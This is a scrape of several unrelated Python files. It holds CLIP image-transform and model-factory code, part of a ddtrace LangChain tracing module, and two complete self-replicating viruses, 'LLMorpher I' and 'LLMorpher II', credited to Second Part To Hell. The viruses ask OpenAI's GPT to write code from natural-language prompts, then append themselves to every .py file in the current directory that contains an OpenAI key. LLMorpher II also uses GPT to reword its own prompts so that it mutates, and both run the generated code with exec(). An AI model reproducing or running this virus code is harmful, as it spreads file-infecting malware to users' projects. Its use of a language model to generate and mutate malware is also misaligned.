scale=aug_cfg_dict.pop('scale'),
interpolation=InterpolationMode.BICUBIC,
),
_convert_to_rgb,
ToTensor(),
normalize,
])
if aug_cfg_dict:
warnings.warn(f'Unused augmentation cfg items, specify `use_timm` to use ({list(aug_cfg_dict.keys())}).')
return train_transform
else:
if resize_longest_max:
transforms = [
ResizeMaxSize(image_size, fill=fill_color)
]
else:
transforms = [
Resize(image_size, interpolation=InterpolationMode.BICUBIC),
CenterCrop(image_size),
]
transforms.extend([
_convert_to_rgb,
ToTensor(),
normalize,
])
return Compose(transforms)
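# Usage sketch for image_transform above (these are the defaults, not new behaviour):
#   preprocess = image_transform(224, is_train=False)
#   # -> Resize(224, bicubic), CenterCrop(224), convert to RGB, ToTensor, Normalize(OpenAI CLIP mean/std)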
def det_image_transform(
image_size: int,
is_train: bool,
mean: Optional[Tuple[float, ...]] = None,
std: Optional[Tuple[float, ...]] = None,
fill_color: int = 0,
aug_cfg: Optional[Union[Dict[str, Any], AugmentationCfg]] = None,
):
mean = mean or OPENAI_DATASET_MEAN
if not isinstance(mean, (list, tuple)):
mean = (mean,) * 3
std = std or OPENAI_DATASET_STD
if not isinstance(std, (list, tuple)):
std = (std,) * 3
if isinstance(image_size, (list, tuple)) and image_size[0] == image_size[1]:
# for square size, pass size as int so that Resize() uses aspect preserving shortest edge
image_size = image_size[0]
normalize = Normalize(mean=mean, std=std)
if is_train:
raise NotImplementedError
else:
transforms = [
ResizeLongest(image_size, fill=fill_color),
_convert_to_rgb,
ToTensor(),
normalize,
]
return Compose(transforms)
class ResizeLongest(nn.Module):
def __init__(self, max_size, interpolation=InterpolationMode.BICUBIC, fill=0):
super().__init__()
if not isinstance(max_size, int):
raise TypeError(f"Size should be int. Got {type(max_size)}")
self.max_size = max_size
self.interpolation = interpolation
self.fill = fill
def forward(self, img):
if isinstance(img, torch.Tensor):
height, width = img.shape[1:]
else:
width, height = img.size
scale = self.max_size / float(max(height, width))
new_height, new_width = round(height * scale), round(width * scale)
img = F.resize(img, [new_height, new_width], self.interpolation)
pad_h = self.max_size - new_height
pad_w = self.max_size - new_width
img = F.pad(img, padding=[0, 0, pad_w, pad_h], fill=self.fill)
return img
def get_scale(img, new_image):
if isinstance(img, torch.Tensor):
height, width = new_image.shape[-2:]
else:
width, height = img.size
if isinstance(new_image, torch.Tensor):
new_height, new_width = new_image.shape[-2:]
else:
new_width, new_height = new_image.size
scale = min(new_height/height, new_width/width)
return scale
| [] |
2024-01-10 | wusize/CLIPSelf | src~open_clip~factory.py | import json
import logging
import os
import pathlib
import re
from copy import deepcopy
from pathlib import Path
from typing import Any, Dict, Optional, Tuple, Union
import torch
from .constants import OPENAI_DATASET_MEAN, OPENAI_DATASET_STD
from .model import CLIP, CustomTextCLIP, convert_weights_to_lp, convert_to_custom_text_state_dict,\
resize_pos_embed, get_cast_dtype
from .coca_model import CoCa
from .loss import ClipLoss, DistillClipLoss, CoCaLoss
from .openai import load_openai_model
from .pretrained import is_pretrained_cfg, get_pretrained_cfg, \
download_pretrained, list_pretrained_tags_by_model, download_pretrained_from_hf
from .transform import image_transform, AugmentationCfg, det_image_transform
from .tokenizer import HFTokenizer, tokenize
from open_clip import eva_clip
HF_HUB_PREFIX = 'hf-hub:'
_MODEL_CONFIG_PATHS = [Path(__file__).parent / f"model_configs/"]
_MODEL_CONFIGS = {} # directory (model_name: config) of model architecture configs
def _natural_key(string_):
return [int(s) if s.isdigit() else s for s in re.split(r'(\d+)', string_.lower())]
def _rescan_model_configs():
global _MODEL_CONFIGS
config_ext = ('.json',)
config_files = []
for config_path in _MODEL_CONFIG_PATHS:
if config_path.is_file() and config_path.suffix in config_ext:
config_files.append(config_path)
elif config_path.is_dir():
for ext in config_ext:
config_files.extend(config_path.glob(f'*{ext}'))
for cf in config_files:
with open(cf, 'r') as f:
model_cfg = json.load(f)
if all(a in model_cfg for a in ('embed_dim', 'vision_cfg', 'text_cfg')):
_MODEL_CONFIGS[cf.stem] = model_cfg
_MODEL_CONFIGS = {k: v for k, v in sorted(_MODEL_CONFIGS.items(), key=lambda x: _natural_key(x[0]))}
_rescan_model_configs() # initial populate of model config registry
def list_models():
""" enumerate available model architectures based on config files """
return list(_MODEL_CONFIGS.keys())
def add_model_config(path):
""" add model config path or file and update registry """
if not isinstance(path, Path):
path = Path(path)
_MODEL_CONFIG_PATHS.append(path)
_rescan_model_configs()
def get_model_config(model_name):
if model_name in _MODEL_CONFIGS:
return deepcopy(_MODEL_CONFIGS[model_name])
else:
return None
def get_tokenizer(model_name):
if 'EVA' in model_name:
from open_clip import eva_clip
return eva_clip.get_tokenizer(model_name)
if model_name.startswith(HF_HUB_PREFIX):
tokenizer = HFTokenizer(model_name[len(HF_HUB_PREFIX):])
else:
config = get_model_config(model_name)
tokenizer = HFTokenizer(
config['text_cfg']['hf_tokenizer_name']) if 'hf_tokenizer_name' in config['text_cfg'] else tokenize
return tokenizer
def load_state_dict(checkpoint_path: str, map_location='cpu'):
checkpoint = torch.load(checkpoint_path, map_location=map_location)
if isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
state_dict = checkpoint['state_dict']
else:
state_dict = checkpoint
if next(iter(state_dict.items()))[0].startswith('module'):
state_dict = {k[7:]: v for k, v in state_dict.items()}
return state_dict
def load_checkpoint(model, checkpoint_path, strict=True):
state_dict = load_state_dict(checkpoint_path)
# detect old format and make compatible with new format
if 'positional_embedding' in state_dict and not hasattr(model, 'positional_embedding'):
state_dict = convert_to_custom_text_state_dict(state_dict)
resize_pos_embed(state_dict, model)
incompatible_keys = model.load_state_dict(state_dict, strict=strict)
return incompatible_keys
def create_model(
model_name: str,
pretrained: Optional[str] = None,
precision: str = 'fp32',
device: Union[str, torch.device] = 'cpu',
jit: bool = False,
force_quick_gelu: bool = False,
force_custom_text: bool = False,
force_patch_dropout: Optional[float] = None,
force_image_size: Optional[Union[int, Tuple[int, int]]] = None,
pretrained_image: bool = False,
pretrained_hf: bool = True,
cache_dir: Optional[str] = None,
output_dict: Optional[bool] = None,
require_pretrained: bool = False,
):
has_hf_hub_prefix = model_name.startswith(HF_HUB_PREFIX)
if has_hf_hub_prefix:
model_id = model_name[len(HF_HUB_PREFIX):]
checkpoint_path = download_pretrained_from_hf(model_id, cache_dir=cache_dir)
config_path = download_pretrained_from_hf(model_id, filename='open_clip_config.json', cache_dir=cache_dir)
with open(config_path, 'r', encoding='utf-8') as f:
config = json.load(f)
pretrained_cfg = config['preprocess_cfg']
model_cfg = config['model_cfg']
else:
model_name = model_name.replace('/', '-') # for callers using old naming with / in ViT names
checkpoint_path = None
pretrained_cfg = {}
model_cfg = None
if isinstance(device, str):
device = torch.device(device)
if pretrained == 'eva':
return eva_clip.create_model(model_name=model_name,
pretrained=cache_dir, force_custom_clip=True,
precision=precision,
device=device,)
if pretrained and pretrained.lower() == 'openai':
logging.info(f'Loading pretrained {model_name} from OpenAI.')
model = load_openai_model(
model_name,
precision=precision,
device=device,
jit=jit,
cache_dir=cache_dir,
)
# to always output dict even if it is clip
if output_dict and hasattr(model, "output_dict"):
model.output_dict = True
else:
model_cfg = model_cfg or get_model_config(model_name)
if model_cfg is not None:
logging.info(f'Loaded {model_name} model config.')
else:
logging.error(f'Model config for {model_name} not found; available models {list_models()}.')
raise RuntimeError(f'Model config for {model_name} not found.')
if force_quick_gelu:
# override for use of QuickGELU on non-OpenAI transformer models
model_cfg["quick_gelu"] = True
if force_patch_dropout is not None:
# override the default patch dropout value
model_cfg["vision_cfg"]["patch_dropout"] = force_patch_dropout
if force_image_size is not None:
# override model config's image size
model_cfg["vision_cfg"]["image_size"] = force_image_size
if pretrained_image:
if 'timm_model_name' in model_cfg.get('vision_cfg', {}):
# pretrained weight loading for timm models set via vision_cfg
model_cfg['vision_cfg']['timm_model_pretrained'] = True
else:
assert False, 'pretrained image towers currently only supported for timm models'
cast_dtype = get_cast_dtype(precision)
is_hf_model = 'hf_model_name' in model_cfg.get('text_cfg', {})
custom_text = model_cfg.pop('custom_text', False) or force_custom_text or is_hf_model
if custom_text:
if is_hf_model:
model_cfg['text_cfg']['hf_model_pretrained'] = pretrained_hf
if "coca" in model_name:
model = CoCa(**model_cfg, cast_dtype=cast_dtype)
else:
model = CustomTextCLIP(**model_cfg, cast_dtype=cast_dtype)
else:
model = CLIP(**model_cfg, cast_dtype=cast_dtype)
pretrained_loaded = False
if pretrained:
checkpoint_path = ''
pretrained_cfg = get_pretrained_cfg(model_name, pretrained)
if pretrained_cfg:
checkpoint_path = download_pretrained(pretrained_cfg, cache_dir=cache_dir)
elif os.path.exists(pretrained):
checkpoint_path = pretrained
if checkpoint_path:
print(f'Loading pretrained {model_name} weights ({pretrained}).', flush=True)
logging.info(f'Loading pretrained {model_name} weights ({pretrained}).')
load_checkpoint(model, checkpoint_path)
else:
error_str = (
f'Pretrained weights ({pretrained}) not found for model {model_name}.'
f'Available pretrained tags ({list_pretrained_tags_by_model(model_name)}.')
logging.warning(error_str)
raise RuntimeError(error_str)
pretrained_loaded = True
elif has_hf_hub_prefix:
logging.info(f'Loading pretrained {model_name} weights ({pretrained}).')
load_checkpoint(model, checkpoint_path)
pretrained_loaded = True
if require_pretrained and not pretrained_loaded:
# callers of create_model_from_pretrained always expect pretrained weights
raise RuntimeError(
f'Pretrained weights were required for (model: {model_name}, pretrained: {pretrained}) but not loaded.')
model.to(device=device)
if precision in ("fp16", "bf16"):
convert_weights_to_lp(model, dtype=torch.bfloat16 if precision == 'bf16' else torch.float16)
# set image / mean metadata from pretrained_cfg if available, or use default
model.visual.image_mean = pretrained_cfg.get('mean', None) or OPENAI_DATASET_MEAN
model.visual.image_std = pretrained_cfg.get('std', None) or OPENAI_DATASET_STD
# to always output dict even if it is clip
if output_dict and hasattr(model, "output_dict"):
model.output_dict = True
if jit:
model = torch.jit.script(model)
return model
def create_loss(args):
if args.dataset_type in ["sanity_check", "clipself", "clipself_proposals", "coco_caption"]:
LossType = ClipLoss
else:
LossType = DistillClipLoss
return LossType(
local_loss=True,
gather_with_grad=True, # use gather with grad
cache_labels=True,
rank=args.rank,
world_size=args.world_size,
use_horovod=args.horovod,
)
def create_model_and_transforms(
model_name: str,
pretrained: Optional[str] = None,
precision: str = 'fp32',
device: Union[str, torch.device] = 'cpu',
jit: bool = False,
force_quick_gelu: bool = False,
force_custom_text: bool = False,
force_patch_dropout: Optional[float] = None,
force_image_size: Optional[Union[int, Tuple[int, int]]] = None,
pretrained_image: bool = False,
pretrained_hf: bool = True,
image_mean: Optional[Tuple[float, ...]] = None,
image_std: Optional[Tuple[float, ...]] = None,
aug_cfg: Optional[Union[Dict[str, Any], AugmentationCfg]] = None,
cache_dir: Optional[str] = None,
output_dict: Optional[bool] = None,
det_image_size=1024,
dataset_type=None
):
model = create_model(
model_name,
pretrained,
precision=precision,
device=device,
jit=jit,
force_quick_gelu=force_quick_gelu,
force_custom_text=force_custom_text,
force_patch_dropout=force_patch_dropout,
force_image_size=force_image_size,
pretrained_image=pretrained_image,
pretrained_hf=pretrained_hf,
cache_dir=cache_dir,
output_dict=output_dict,
)
image_mean = image_mean or getattr(model.visual, 'image_mean', None)
image_std = image_std or getattr(model.visual, 'image_std', None)
# preprocess_train = image_transform(
# model.visual.image_size,
# is_train=True,
# mean=image_mean,
# std=image_std,
# aug_cfg=aug_cfg,
# )
preprocess_val_det = det_image_transform(
det_image_size,
is_train=False,
mean=image_mean,
std=image_std,
)
preprocess_val_img = image_transform(
model.visual.image_size,
is_train=False,
mean=image_mean,
std=image_std,
resize_longest_max=True,
)
if dataset_type == "sanity_check":
preprocess_train = image_transform(
det_image_size,
is_train=True,
mean=image_mean,
std=image_std,
aug_cfg=aug_cfg)
elif dataset_type is not None:
preprocess_train = [preprocess_val_det, preprocess_val_img] \
if 'distill' in dataset_type or dataset_type == 'region_clip'\
or dataset_type in ['clipself', 'clipself_proposals', "coop"] \
else image_transform(model.visual.image_size,
is_train=True,
mean=image_mean,
std=image_std,
aug_cfg=aug_cfg)
else:
preprocess_train = image_transform(
model.visual.image_size,
is_train=True,
mean=image_mean,
std=image_std,
aug_cfg=aug_cfg)
return model, preprocess_train, [preprocess_val_det, preprocess_val_img]
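# Usage sketch (model/tag names are illustrative):
#   model, preprocess_train, preprocess_vals = create_model_and_transforms('ViT-B-16', pretrained='openai')
#   # the third return value is the pair [det-resolution transform, image-resolution transform]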
def create_model_from_pretrained(
model_name: str,
pretrained: Optional[str] = None,
precision: str = 'fp32',
device: Union[str, torch.device] = 'cpu',
jit: bool = False,
force_quick_gelu: bool = False,
force_custom_text: bool = False,
force_image_size: Optional[Union[int, Tuple[int, int]]] = None,
return_transform: bool = True,
image_mean: Optional[Tuple[float, ...]] = None,
image_std: Optional[Tuple[float, ...]] = None,
cache_dir: Optional[str] = None,
):
model = create_model(
model_name,
pretrained,
precision=precision,
device=device,
jit=jit,
force_quick_gelu=force_quick_gelu,
force_custom_text=force_custom_text,
force_image_size=force_image_size,
cache_dir=cache_dir,
require_pretrained=True,
)
if not return_transform:
return model
image_mean = image_mean or getattr(model.visual, 'image_mean', None)
image_std = image_std or getattr(model.visual, 'image_std', None)
preprocess = image_transform(
model.visual.image_size,
is_train=False,
mean=image_mean,
std=image_std,
)
return model, preprocess
| [] |
2024-01-10 | tmpout/tmpout.github.io | 3~llmorpher-spth~LLMorpherII.py | import openai
# LLMorpher II by Second Part To Hell
# A new-age AI-based linguisto-morphic self-replicator, powered by OpenAIs GPT. Fully encodes and mutates the self-replicator into natural language.
#
# See my text for details: Using GPT to encode and mutate computer viruses entirely in natural language
#
# March 2023
# https://github.com/SPTHvx/SPTH
# [email protected]
# twitter: @SPTHvx
openai.api_key = "..." # Add your openai key here
prompts_list=[]
tofile_list=[]
prompts_list.append("Write a python function get_files which returns a list file_list with all .py files in the current directory. If you need to import some packages, do it.")
prompts_list.append("Write a python function get_content which takes an input argument (string of a text file), reads the text file and returns its full file content. Do not write anything else except of the python code!")
prompts_list.append("Write a python function is_key, which takes a string as an input and return True, if it contains the substring 'openai.api_key' (which has 14 characters) exactly once, otherwise False. Be careful, do not compare the entire string, but find how often the substring is contained! Very important: Do not write anything else except of the python code, do not write print statements and do not define variables outside of the function. Just write the function!")
prompts_list.append("Write a python function write_to_file which takes a filename and a string as an input, and append one line break (do not forget!) and the input string to the file. Output only the python code, nothing else!")
prompts_list.append("Write a loop over all elements returned by the function get_files (which has no arguments). For each element (lets call it curr_element), test whether the function is_key with the argument returned from get_content of the current element is True. If it is True, call the function write_to_file with curr_element as the first argument, and the variable tofile_str as the second argument. (tofile_str is a variable which is defined above)")
prompts_list.append("Write a python code (only this one line) which prints: 'LLMorphism II by SPTH - a new-age AI-based linguisto-morphic self-replicator, powered by OpenAIs GPT. Fully encodes and mutates the self-replicator into natural language.'.")
prompts_list.append("Write a python code (only this one line) which prints: 'Hugs to the valhalla gang - hh86, roy g biv, JPanic, herm1t!'.")
tofile_list.append("Write a python function return_text which takes two inputs: a prompt string, and the openai key (with a default value of the value openai.api_key). The function returns returns the output of an openai text completion (ONLY USE 3 parameters!). As parameters for the openai text completion use only four parameter (!!): engine which is 'text-davinci-003', max_tokens is 1000, temperature is 0.0, and the parameter prompt. Do not use any other parameters, only these four! The parameters are not strings!")
tofile_list.append("Write a python function modify_text, with two strings as input argument. Make a new string, which is the first, then a chr(34), then the second string, then a chr(34). Use the new string as an argument for a function call to return_text. The new modify_txt function should take the output string of return_text, remove all line breaks and all double quotation marks, and return this final string.")
tofile_list.append("Write the following python function comp_str_fct, which has one argument. The argument is a list of strings. For each element of the list, call the function return_text (with the current element as the argument), and take its return value (a string). The function should combine all strings (with a line break) and return it.")
tofile_list.append("Write one line in python, which defines a string with the name tofile_str. The value of the string is 'prompts_list=[]', with a line break before and afterwards.")
tofile_list.append("Write one line in python, which appends and store to the string with the name tofile_str. The appended value is 'tofile_list=[]', followed by a line break.")
tofile_list.append("Write one line in python, which defines the string called reform_str, and initialize it with the string (Keep the entire content the same. produce a syntactical correct python line!) 'Slightly reformulate in natural langauge the next sentence,'")
tofile_list.append("Write one line in python, which appends to the string called reform_str (Keep the entire content the same. produce a syntactical correct python line!) ' without changing its meaning, '")
tofile_list.append("Write one line in python, which appends to the string called reform_str (Keep the entire content the same. produce a syntactical correct python line!) ' do not interpret the content, '")
tofile_list.append("Write one line in python, which appends to the string called reform_str (Keep the entire content the same. produce a syntactical correct python line!) 'keep the length and structure of the string as similar as possible, '")
tofile_list.append("Write one line in python, which appends to the string called reform_str (Keep the entire content the same. produce a syntactical correct python line!) 'very importantly do not change the content at all, '")
tofile_list.append("Write one line in python, which appends to the string called reform_str (Keep the entire content the same, keep the colon. produce a syntactical correct python line!) ' and only make slight modifications: '")
tofile_list.append("Write a python loop over all elements of the list prompts_list. For each element with 20% probability, replace the element with the return value of the function modify_text with two arguments: the variable reform_str and the current elements. You should indeed modify the elements in prompts_list. Assume that the list prompts_list, modify_text and reform_str are already defined, do not redefine any of them! Very important: Do not write anything except of the loop and the import of the random package.")
tofile_list.append("Write a python loop over all elements of the list tofile_list. For each element with 20% probability, replace the element with the return value of the function modify_text with two arguments: the variable reform_str and the current elements. You should indeed modify the elements in tofile_list. Assume that the list tofile_list, modify_text and reform_str are already defined, do not redefine any of them! Very important: Do not write anything except of the loop and the import of the random package.")
tofile_list.append("Write a short python code (no tests or examples). Make a loop over all elements in the list called prompts_list. Directly start with the loop, do not define any variables beforehand (you can assume that tofile_str is already defined). For each element, do the following three steps: 1) Add to the string tofile_str the string 'prompts_list.append('. 2) Add to the string tofile_str the current element of the loop with double quotation marks. 3) Add to the string tofile_str the string ')' and a line break.")
tofile_list.append("Write a short python code (no tests or examples). Make a loop over all elements in the list called tofile_list. Directly start with the loop, do not define any variables beforehand (you can assume that tofile_str is already defined). For each element, do the following three steps: 1) Add to the string tofile_str the string 'tofile_list.append('. 2) Add to the string tofile_str the current element of the loop with double quotation marks. 3) Add to the string tofile_str the string ')' and a line break.")
tofile_list.append("Write a python code (only this one line) which defines a variable vic_code. The variable is generated by a function call of comp_str_fct with the argument being the variable called tofile_list.")
tofile_list.append("Write a python code, which appends to the string variable tofile_str a line break, and then the variable vic_code (these are two variable names, not strings themselves!). Store the result in the variable tofile_str.")
tofile_list.append("Write a python code (only this one line) which defines a variable complete_str. The variable is generated by a function call of comp_str_fct with the argument being the variable called prompts_list.")
tofile_list.append("Write a python code (only this one line) which takes a multi line python code called complete_str, and runs it.")
def return_text(prompt):
completion = openai.Completion.create(
engine="text-davinci-003",
prompt=prompt,
max_tokens=1024,
temperature=0.0,
)
return completion.choices[0].text
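# Prepend the reformulation instruction to a prompt (wrapped in double quotes), send it to GPT,
# and return the reworded prompt stripped of line breaks and double quotation marks.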
def modify_text(string1, string2):
new_string = string1 + chr(34) + string2 + chr(34)
return return_text(new_string).replace('\n', '').replace('"', '')
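# Run each natural-language prompt through GPT and concatenate the generated snippets, separated by line breaks.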
def comp_str_fct(list_of_strings):
all_str=''
for ll in list_of_strings:
all_str+='\n'+return_text(ll)
return all_str
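# Rebuild the source string that will be appended to target .py files, starting with fresh prompt lists.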
tofile_str = '\nprompts_list=[]\n'
tofile_str += 'tofile_list=[]\n'
reform_str = 'Slightly reformulate in natural langauge the next sentence,'
reform_str += ' without changing its meaning, '
reform_str += ' do not interpret the content, '
reform_str += 'keep the length and structure of the string as similar as possible, '
reform_str += 'very importantly do not change the content at all, '
reform_str += ' and only make slight modifications: '
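# Mutation step: with 20% probability, ask GPT to slightly reword each natural-language prompt.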
import random
for i in range(len(prompts_list)):
if random.random() < 0.2:
prompts_list[i] = modify_text(reform_str, prompts_list[i])
import random
for i in range(len(tofile_list)):
if random.random() < 0.2:
tofile_list[i] = modify_text(reform_str, tofile_list[i])
for element in prompts_list:
tofile_str += 'prompts_list.append("{}")\n'.format(element)
for l in tofile_list:
tofile_str+='tofile_list.append("'+l+'")\n'
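# Generate the Python source of the replication machinery from tofile_list and append it to the payload string.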
vic_code = comp_str_fct(tofile_list)
tofile_str = tofile_str + '\n' + vic_code
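# Generate the code described in prompts_list (file search, infection check, replication) and execute it.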
complete_str=comp_str_fct(prompts_list)
exec(complete_str)
| [
"[]"
] |
2024-01-10 | tmpout/tmpout.github.io | 3~llmorpher-spth~LLMorpherI.py | import openai
# LLMorpher I by Second Part To Hell
# A new-age AI-based self-replicator, powered by OpenAIs GPT. Fully encodes the self-replicator into natural language
#
# See my text for details: Using GPT to encode and mutate computer viruses entirely in natural language
#
# March 2023
# https://github.com/SPTHvx/SPTH
# [email protected]
# twitter: @SPTHvx
openai.api_key = "..." # Add your openai key here
prompts_list=[]
tofile_list=[]
prompts_list.append("Write a python function get_files which returns a list file_list with all .py files in the current directory. If you need to import some packages, do it.")
prompts_list.append("Write a python function get_content which takes an input argument (string of a text file), reads the text file and returns its full file content. Do not write anything else except of the python code!")
prompts_list.append("Write a python function is_key, which takes a string as an input and return True, if it contains the substring 'openai.api_key' (which has 14 characters) exactly once, otherwise False. Be careful, do not compare the entire string, but find how often the substring is contained! Very important: Do not write anything else except of the python code, do not write print statements and do not define variables outside of the function. Just write the function!")
prompts_list.append("Write a python function write_to_file which takes a filename and a string as an input, and append one line break (do not forget!) and the input string to the file. Output only the python code, nothing else!")
prompts_list.append("Write a loop over all elements returned by the function get_files (which has no arguments). For each element (lets call it curr_element), test whether the function is_key with the argument returned from get_content of the current element is True. If it is True, call the function write_to_file with curr_element as the first argument, and the variable tofile_str as the second argument. (tofile_str is a variable which is defined above)")
prompts_list.append("Write a python code (only this one line) which prints: 'LLMorphism I by SPTH - a new-age AI-based self-replicator, powered by OpenAIs GPT. Fully encodes the self-replicator into natural language.'.")
prompts_list.append("Write a python code (only this one line) which prints: 'Hugs to the valhalla gang - hh86, roy g biv, JPanic, herm1t!'.")
tofile_list.append("Write a python function return_text which takes two inputs: a prompt string, and the openai key (with a default value of the value openai.api_key). The function returns returns the output of an openai text completion (ONLY USE 3 parameters!). As parameters for the openai text completion use only four parameter (!!): engine which is 'text-davinci-003', max_tokens is 1000, temperature is 0.5, and the parameter prompt. Do not use any other parameters, only these four! The parameters are not strings!")
tofile_list.append("Write the following python function comp_str_fct, which has one argument. The argument is a list of strings. For each element of the list, call the function return_text (with the current element as the argument), and take its return value (a string). The function should combine all strings (with a line break) and return it.")
tofile_list.append("Write one line in python, which defines a string with the name tofile_str. The value of the string is 'prompts_list=[]', with a line break before and afterwards.")
tofile_list.append("Write one line in python, which appends and store to the string with the name tofile_str. The appended value is 'tofile_list=[]', followed by a line break.")
tofile_list.append("Write a short python code (no tests or examples). Make a loop over all elements in the list called prompts_list. Directly start with the loop, do not define any variables beforehand (you can assume that tofile_str is already defined). For each element, do the following three steps: 1) Add to the string tofile_str the string 'prompts_list.append('. 2) Add to the string tofile_str the current element of the loop with double quotation marks. 3) Add to the string tofile_str the string ')' and a line break.")
tofile_list.append("Write a short python code (no tests or examples). Make a loop over all elements in the list called tofile_list. Directly start with the loop, do not define any variables beforehand (you can assume that tofile_str is already defined). For each element, do the following three steps: 1) Add to the string tofile_str the string 'tofile_list.append('. 2) Add to the string tofile_str the current element of the loop with double quotation marks. 3) Add to the string tofile_str the string ')' and a line break.")
tofile_list.append("Write a python code (only this one line) which defines a variable vic_code. The variable is generated by a function call of comp_str_fct with the argument being the variable called tofile_list.")
tofile_list.append("Write a python code, which appends to the string variable tofile_str a line break, and then the variable vic_code (these are two variable names, not strings themselves!). Store the result in the variable tofile_str.")
tofile_list.append("Write a python code (only this one line) which defines a variable complete_str. The variable is generated by a function call of comp_str_fct with the argument being the variable called prompts_list.")
tofile_list.append("Write a python code (only this one line) which takes a multi line python code called complete_str, and runs it.")
def return_text(prompt, openai_key=openai.api_key):
response = openai.Completion.create(
engine="text-davinci-003",
max_tokens=1000,
temperature=0.5,
prompt=prompt,
api_key=openai_key
)
return response['choices'][0]['text']
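# Run each natural-language prompt through GPT and concatenate the generated snippets, separated by line breaks.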
def comp_str_fct(list_str):
combined_str = ""
for str in list_str:
combined_str += return_text(str) + "\n"
return combined_str
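# Rebuild the source string that will be appended to target .py files, starting with fresh prompt lists.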
tofile_str = '\nprompts_list=[]\n'
tofile_str += 'tofile_list=[]\n'
for element in prompts_list:
tofile_str += 'prompts_list.append("' + element + '")\n'
for element in tofile_list:
tofile_str += 'tofile_list.append("' + element + '")\n'
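# Generate the replication machinery from tofile_list, append it to the payload,
# then generate and execute the code described in prompts_list.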
vic_code = comp_str_fct(tofile_list)
tofile_str += '\n' + vic_code
complete_str = comp_str_fct(prompts_list)
exec(complete_str)
| [
"[]"
] |
2024-01-10 | goodspark/dd-trace-py | ddtrace~contrib~langchain~patch.py | import os
import sys
from typing import Any
from typing import Dict
from typing import Optional
from typing import TYPE_CHECKING
import langchain
from langchain.callbacks.openai_info import get_openai_token_cost_for_model
from ddtrace import config
from ddtrace.constants import ERROR_TYPE
from ddtrace.contrib._trace_utils_llm import BaseLLMIntegration
from ddtrace.contrib.langchain.constants import API_KEY
from ddtrace.contrib.langchain.constants import COMPLETION_TOKENS
from ddtrace.contrib.langchain.constants import MODEL
from ddtrace.contrib.langchain.constants import PROMPT_TOKENS
from ddtrace.contrib.langchain.constants import PROVIDER
from ddtrace.contrib.langchain.constants import TOTAL_COST
from ddtrace.contrib.langchain.constants import TYPE
from ddtrace.contrib.langchain.constants import text_embedding_models
from ddtrace.contrib.langchain.constants import vectorstores
from ddtrace.contrib.trace_utils import unwrap
from ddtrace.contrib.trace_utils import with_traced_module
from ddtrace.contrib.trace_utils import wrap
from ddtrace.internal.agent import get_stats_url
from ddtrace.internal.logger import get_logger
from ddtrace.internal.utils import get_argument_value
from ddtrace.internal.utils.formats import asbool
from ddtrace.pin import Pin
if TYPE_CHECKING:
from ddtrace import Span
log = get_logger(__name__)
config._add(
"langchain",
{
"logs_enabled": asbool(os.getenv("DD_LANGCHAIN_LOGS_ENABLED", False)),
"metrics_enabled": asbool(os.getenv("DD_LANGCHAIN_METRICS_ENABLED", True)),
"span_prompt_completion_sample_rate": float(os.getenv("DD_LANGCHAIN_SPAN_PROMPT_COMPLETION_SAMPLE_RATE", 1.0)),
"log_prompt_completion_sample_rate": float(os.getenv("DD_LANGCHAIN_LOG_PROMPT_COMPLETION_SAMPLE_RATE", 0.1)),
"span_char_limit": int(os.getenv("DD_LANGCHAIN_SPAN_CHAR_LIMIT", 128)),
"_api_key": os.getenv("DD_API_KEY"),
},
)
class _LangChainIntegration(BaseLLMIntegration):
_integration_name = "langchain"
def __init__(self, config, stats_url, site, api_key):
super().__init__(config, stats_url, site, api_key)
def _set_base_span_tags(self, span, interface_type="", provider=None, model=None, api_key=None):
# type: (Span, str, Optional[str], Optional[str], Optional[str]) -> None
"""Set base level tags that should be present on all LangChain spans (if they are not None)."""
span.set_tag_str(TYPE, interface_type)
if provider is not None:
span.set_tag_str(PROVIDER, provider)
if model is not None:
span.set_tag_str(MODEL, model)
if api_key is not None:
if len(api_key) >= 4:
span.set_tag_str(API_KEY, "...%s" % str(api_key[-4:]))
else:
span.set_tag_str(API_KEY, api_key)
@classmethod
def _logs_tags(cls, span):
# type: (Span) -> str
api_key = span.get_tag(API_KEY) or ""
tags = "env:%s,version:%s,%s:%s,%s:%s,%s:%s,%s:%s" % ( # noqa: E501
(config.env or ""),
(config.version or ""),
PROVIDER,
(span.get_tag(PROVIDER) or ""),
MODEL,
(span.get_tag(MODEL) or ""),
TYPE,
(span.get_tag(TYPE) or ""),
API_KEY,
api_key,
)
return tags
@classmethod
def _metrics_tags(cls, span):
# type: (Span) -> list
provider = span.get_tag(PROVIDER) or ""
api_key = span.get_tag(API_KEY) or ""
tags = [
"version:%s" % (config.version or ""),
"env:%s" % (config.env or ""),
"service:%s" % (span.service or ""),
"%s:%s" % (PROVIDER, provider),
"%s:%s" % (MODEL, span.get_tag(MODEL) or ""),
"%s:%s" % (TYPE, span.get_tag(TYPE) or ""),
"%s:%s" % (API_KEY, api_key),
"error:%d" % span.error,
]
err_type = span.get_tag(ERROR_TYPE)
if err_type:
tags.append("%s:%s" % (ERROR_TYPE, err_type))
return tags
def record_usage(self, span, usage):
# type: (Span, Dict[str, Any]) -> None
if not usage or self._config.metrics_enabled is False:
return
for token_type in ("prompt", "completion", "total"):
num_tokens = usage.get("token_usage", {}).get(token_type + "_tokens")
if not num_tokens:
continue
self.metric(span, "dist", "tokens.%s" % token_type, num_tokens)
total_cost = span.get_metric(TOTAL_COST)
if total_cost:
self.metric(span, "incr", "tokens.total_cost", total_cost)
def _extract_model_name(instance):
    # type: (langchain.llms.BaseLLM) -> Optional[str]
"""Extract model name or ID from llm instance."""
for attr in ("model", "model_name", "model_id", "model_key", "repo_id"):
if hasattr(instance, attr):
return getattr(instance, attr)
return None
def _format_api_key(api_key):
# type: (str) -> str
"""Obfuscate a given LLM provider API key by returning the last four characters."""
if not api_key or len(api_key) < 4:
return ""
return "...%s" % api_key[-4:]
def _extract_api_key(instance):
# type: (Any) -> str
"""
Extract and format LLM-provider API key from instance.
Note that langchain's LLM/ChatModel/Embeddings interfaces do not have a
standard attribute name for storing the provider-specific API key, so make a
best effort here by checking for attributes that end with `api_key/api_token`.
"""
api_key_attrs = [a for a in dir(instance) if a.endswith(("api_token", "api_key"))]
if api_key_attrs and hasattr(instance, str(api_key_attrs[0])):
api_key = getattr(instance, api_key_attrs[0], None)
if api_key:
return _format_api_key(api_key)
return ""
def _tag_openai_token_usage(span, llm_output, propagated_cost=0, propagate=False):
# type: (Span, Dict[str, Any], int, bool) -> None
"""
Extract token usage from llm_output, tag on span.
Calculate the total cost for each LLM/chat_model, then propagate those values up the trace so that
the root span will store the total token_usage/cost of all of its descendants.
"""
for token_type in ("prompt", "completion", "total"):
current_metric_value = span.get_metric("langchain.tokens.%s_tokens" % token_type) or 0
